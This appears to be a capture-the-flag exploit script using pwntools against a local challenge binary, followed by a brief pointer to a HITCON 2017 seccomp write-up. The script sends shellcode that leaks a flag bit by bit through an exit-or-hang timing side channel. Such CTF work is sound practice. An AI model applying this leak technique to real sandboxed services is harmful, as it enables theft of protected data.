def z(a=''):
	gdb.attach(cn,a)
	if a == '':
		raw_input()

def bf(nbyte,nbit):
	cn = process('./bigpf_y')

	#z('b*0x56555ECB\nc')
	cn.recvuntil('NAME PROGRAM\n')
	cn.sendline('asdfasdfasdf')
	cn.recvuntil('LOAD PROGRAM\n')
	sc = '''
		/*edi -> flag*/
		add edi,%d /* n byte */
		xor edx,edx
		mov dl,byte ptr [edi]
		shr dl,%d /* n bit */
		and dl,1

		test edx,edx
		jz loop
		xor ebx,ebx
		mov eax,1
		int 0x80 /* exit */
	loop:
		jmp loop
	''' %(nbyte,nbit)
	sc = asm(sc)

	cn.send(p32(len(sc)))
	cn.send(sc)
	sleep(0.01)
	try:
		cn.send('test')
		cn.recv(timeout=0.01)
	except:
		cn.close()
		return 1

	cn.close()
	return 0

out=''
for i in range(0x100): # byte
	ch=''
	for j in range(8):
		ch = str(bf(i,j))+ch
		success(ch)
	intt=int(ch,2)
	if(intt == 0):
		success(out)
		exit(0)
	out+=chr(intt)
  • HITCON 2017 Seccomp

见其他大佬的wp

https://blukat29.github.io/2017/11/hitcon-quals-2017-seccomp/

The BPF instructions operate on the BPF virtual machine, which has four main elements: The accumulator register A, the index register X, the packet memory, and the scratch memory M[].

Reference